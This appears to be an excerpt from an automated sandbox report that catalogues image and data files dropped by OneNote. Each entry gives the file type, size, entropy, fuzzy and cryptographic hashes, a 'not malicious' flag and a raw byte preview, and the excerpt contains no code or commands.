                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.44726255611341
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:aesbII06kT7uuHcMtti6vE15L7RXlp9zwEUFpytrdMruUm4FX/DUKrkNkT3LejPB:aesq3HcMfEDZXz9z2FgRMPLIY
                                                                                                                                                                                                              MD5:71CA01AD96DD60E711C6D38CD4388EB6
                                                                                                                                                                                                              SHA1:91C0ACF14027A1CB686199F624A3637C3AA619B6
                                                                                                                                                                                                              SHA-256:43665DA40C64B9F24A5696AFA69BDB4F1CF32CBE8F612B7CBB0B7227C90A0440
                                                                                                                                                                                                              SHA-512:0055EFEE408B9354B0E7AB44ECE01F820FDB6DB093CD5CBB8BF3FFA020E097708BB03C02AFE19F56571AD05949E4C441439525ECC59CD01DDD4549DE29608690
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ..d.......d......!....d......!....d..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............e}..n......%......N...^...............~(..wm.M....\..........f........................................I.qk..B.....LZ..............e}..n......%............e}..n......%.............d.......d.......d...........................................dj......dT.]....d.......d..B....dH......d..B....d..>.)..d..J...................;........4...4...4.."................d...d...d..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........d.......d....#..d............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15740
                                                                                                                                                                                                              Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                              MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                              SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                              SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                              SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.311272024431886
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5fkBsUcfcAZEe6tQuDcEAkL6EjPXI5mL9hUspyFrdMrEkhwZFXszxzt5p:qs6AWN6jEjXPXH9isARMEkh4O5
                                                                                                                                                                                                              MD5:2E7A210596BB789E6E824D6F294FBA5E
                                                                                                                                                                                                              SHA1:92975870337C75AD3E18C4BC0574B20CF714D159
                                                                                                                                                                                                              SHA-256:3EF33447F32DBC0A2A7500811331BB3890322DD3B05A7A56548A58AE9D63E90D
                                                                                                                                                                                                              SHA-512:A60F7C4E920CE5F09E249E0FD9FBACB3A131ABB9DD4DA1072451E10B9E87719CA0EB0A96C5DA5333D060AA4A196BE1ABF51D95B96B53B6CD2F546524BB42075B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..#.......#i$...%...*.)...#i$...%...*.)...#..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............O.$.....:........N...^................5t...B.u.....z........f........................................I.qk..B.....LZ.............O.$.....:.............O.$.....:...............#.......#.......#...........................................#j......#T.]....#.......#..B....#H......#..B....#..>.)..#..J...................;........4...4...4.."................#...#...#..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........#.......#....#..#............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):86187
                                                                                                                                                                                                              Entropy (8bit):7.951356272886186
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                                                                                              MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                                                                                              SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                                                                                              SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                                                                                              SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.694291310839355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:eGSsIxVfsrOSKWtXYzBEdzbULCBhrVXDI91UcpylrdMrGU9KFXQ18AAtBj:Us+WOfW5YlEtUUJVXDI9Gc4RMFoCnwx
                                                                                                                                                                                                              MD5:446AD8EB166DD1592D7CA0F9B67043CC
                                                                                                                                                                                                              SHA1:3C6B2A053D94CB2F44FEAD4FCD9ECAF2C69DF4CB
                                                                                                                                                                                                              SHA-256:D7996667BAABDF8D8AB213A9C6CBB88A7DBFF44E0B2485DD46DD4E3145D1FE1E
                                                                                                                                                                                                              SHA-512:458939CF5CF26446D6429EFD4B54E2908C26E7F0CFBDECDB5515EBBC980CEA9D5B6B67778A8A4B077BB5A4ADA8B5ACC8D438762E515323154D96C57590042772
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>...t.......v................................I.......I.qk..B.....LZ#`......#`...~..6.p.S...#`...~..6.p.S...#`...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............hh..(...;.d".~.....N...^................N...&.H.g.....y........f...................................H....I.qk..B.....LZ............hh..(...;.d".~.........hh..(...;.d".~..........#`......#`......#`..........................................#`.j....#`.T.]..#`......#`..B..#`.H....#`...B..#`...>.)#`...J...................;........4...4...4.."..............#`..#`..#`...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........#`......#`.....##`.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11197
                                                                                                                                                                                                              Entropy (8bit):7.975073010774664
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                                                                                              MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                                                                                              SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                                                                                              SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                                                                                              SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.329370358995182
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:HGxs6iaFAy+AVdCZRtFkElLEIX069fNUZyzxpyFrdMr2anV8FXUoGmAyMeSgnWPf:mxspFArCZREElJXn92ZyVYRMXnaqCct
                                                                                                                                                                                                              MD5:55C1B91F9554AFF3FE53E1390C610967
                                                                                                                                                                                                              SHA1:0A895B740632454D782E41F653E412E42299DC87
                                                                                                                                                                                                              SHA-256:80F9EC7200962645AA14B1DE7F5E1B7182ACAE90E9D51EFBCBF79D9FA50C61DF
                                                                                                                                                                                                              SHA-512:B9B6BA3475EE3AB7C46C74C44039D04A9040112937E53C5B52514E5D73F5A2960631583AD7CA1C09FE92A150946F6882D5B7CBD78EC487C590EE22DD369C286B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.Y.......Y... ..7W...5.;.Y... ..7W...5.;.Y...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............0g..K.7..~.......N...^...............t.3...D..XF............f........................................I.qk..B.....LZ.............0g..K.7..~............0g..K.7..~.............Y.......Y.......Y...........................................Y.j.....Y.T.]...Y.......Y...B...Y.H.....Y...B...Y...>.).Y...J...................;........4...4...4.."...............Y...Y...Y...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........Y.......Y.....#.Y.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19920
                                                                                                                                                                                                              Entropy (8bit):7.987696084459766
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                                                                                              MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                                                                                              SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                                                                                              SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                                                                                              SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):2.915002931140403
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:xsZr+TDj2US7bTDE1BN0fMX3aTz9JygRMHTET2c+/IbVl:xsGPI3w1BN0EX8z9JygRMe2
                                                                                                                                                                                                              MD5:60126AEC06DB5DF5C97D76EDB2206426
                                                                                                                                                                                                              SHA1:526944BF9EFAE61F634C3496CD6E850CAFB725AC
                                                                                                                                                                                                              SHA-256:EB32EB0CE2AABE1861C9E0FD5A67E67FC5B51EAA4BD3BFF7C7042D006C48B1C9
                                                                                                                                                                                                              SHA-512:D4107F814941D30B9CC0F2C2168E18CC4D744A3598227765389D0BA668F9C35170042D8CB9DCA0A653BF0AE9E31F0B84761AC18C45FD5A225F443610DE7899E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>.......H...v................................I.......I.qk..B.....LZ.V$......V$... .2.(.A....V$... .2.(.A....V$..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................E"Z..Sl..N@.....N...^................l.-/.CM.G.{. .3........f........................................I.qk..B.....LZ...............E"Z..Sl..N@............E"Z..Sl..N@...........V$......V$......V$..........................................V$j.....V$T.]...V$......V$..B...V$H.....V$..B...V$..>.).V$..J...................;........4...4...4.."...............V$..V$..V$..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........V$......V$....#.V$............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):179460
                                                                                                                                                                                                              Entropy (8bit):7.979020171518325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                                                                                              MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                                                                                              SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                                                                                              SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                                                                                              SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.334340660958833
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:qsASxS4it7uE40ViXN1h9ZsApyTlrdMrnBZFXIxoAEovg:qsZS4iUEKXvh9ZR8RMBZaW0
                                                                                                                                                                                                              MD5:49A7935F6FD7F0B14901A4766397DBCE
                                                                                                                                                                                                              SHA1:FF5BE3F5BC2DC5AF4AA13826E97B2F6536E3C99A
                                                                                                                                                                                                              SHA-256:C161B9EC1AE699BAC4824C266AF8DAA9BFD59485B5ABB9292796D7EF923BDFB9
                                                                                                                                                                                                              SHA-512:DCDBB09BFDD94ED462A7D71A6523BEB36E843D16B9840E0A621963E21595888DC1D539007609F233C1F4F24DAA1D7B783D5213F5C287D4F05A0FF7E11039A716
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.......P6".......|...P6".......|.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v...2.i..;vN...R....N...^.................L...UC......z\........f........................................I.qk..B.....LZ............v...2.i..;vN...R........v...2.i..;vN...R................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4....................#.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):109698
                                                                                                                                                                                                              Entropy (8bit):7.954100577911302
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                                                                                              MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                                                                                              SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                                                                                              SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                                                                                              SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.343007484523903
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zh8s/L/UlbEc43EGXD9h1sRMheJ/efW8Tu:zh8s6ELUGXD9h1sRMh1
                                                                                                                                                                                                              MD5:405668A4E3524653DC93B1D1A8161F50
                                                                                                                                                                                                              SHA1:EDE494192ED25196EFEF6683D135F68D8FB07470
                                                                                                                                                                                                              SHA-256:4ECA3ECD9AA7DC2CCB24C0E0CC5D56F0AFC9A9527C385883BF818AEF5CADDFC6
                                                                                                                                                                                                              SHA-512:068FFA47496991C230626EF16832AC46BBC3500026CDC0384ADEAE9F0FCB1D609EF5ABA3F34774017345C391080296B0071896F87A57311866B958B6DB35C29C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........}B.D......<....}B.D......<......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............*V..`..............N...^..................<.8!I./& ...........f........................................I.qk..B.....LZ............*V..`..................*V..`..................................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41893
                                                                                                                                                                                                              Entropy (8bit):7.52654558351485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                              MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                              SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                              SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                              SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):3.2591823178769914
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:GFtLtGwb+zUctTcoQgsCRKtrZCrBJmQEtaDsNDEZVbsPJmQEtaDssDEZxlYJmQEg:1wb8xR8jPEDbPUErl7x//LGo
                                                                                                                                                                                                              MD5:40D37467D8BB5D9FDB1CFF36DE4A36F7
                                                                                                                                                                                                              SHA1:2F3CCFC5CFD040C5D80A8AFC962075BEE9834D27
                                                                                                                                                                                                              SHA-256:630390CE72A2D51CD15B228146B05B7128A46A41C40977BFDF5F44C743168DBB
                                                                                                                                                                                                              SHA-512:A7D7C77BEEDDB3063DECBE2FC616ED5EDB897C8F747F4CC6EFB6F012E7C03D98D1D210E7C5AAD3700271519A467A3AE5690596B1298135D5DB81AC1CDBB4AF85
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........$...........t......................................?....................................................................................................\.........................................(.......(..4.......-...z-......z-X2.y.....Hn...(..4.......-....(.....|..<7..........D..<Z...1./...Z.D............D.......D...................................................%mjT&d..8,.T(P....T.<..D....w..D..X....D....7..D.......D....$................4..(.....x.(.....%mj.....%mj..J.F.#q.X..D.......D..<Z...1./...Z.2...v............................z-.%mj.....................................z-..c..,0...e...B4.$........[.-...I.......9......................8,......8,.....B.:;..............z2..J..(sUl[.8,.....B.:;.....8,..%mj..J.F.#q.X..%mj...z2..J..(sUl[........>...................|..<7......D..<Z...1./...Z.............................|..<7......D.......D..<Z...1./...Z......%mj..........c..,0...e...B4.$..............E........................................0...........e....4....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.908265727815883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:A1KRsgPucjDeI9cHh9iV8/hWOWRvc76QhOf2wv7hXcpT/cZ+RzGPVOx6q9x9NL7m:A1KmgPukWscCRA8fxI1RzFx6q9x9NL7m
                                                                                                                                                                                                              MD5:06D59E962436A083B9BCA12575CFFD88
                                                                                                                                                                                                              SHA1:ED99CD0E415AE6B36F45FDDE6E30732ECF887D31
                                                                                                                                                                                                              SHA-256:92D4C7FD12E6DC9C73128C101F901AE0B5BFABAEAFA805838EAF0E7C167C9422
                                                                                                                                                                                                              SHA-512:2635B6B115E4892E90499DEDF69D04DA42B1BFAFFD48F0DA28C36AC49E798DD42B4FA77064FB08AEA0D6A3291F22E62F11507CE27F4083E96695745F1FA85B06
                                                                                                                                                                                                              Malicious:false
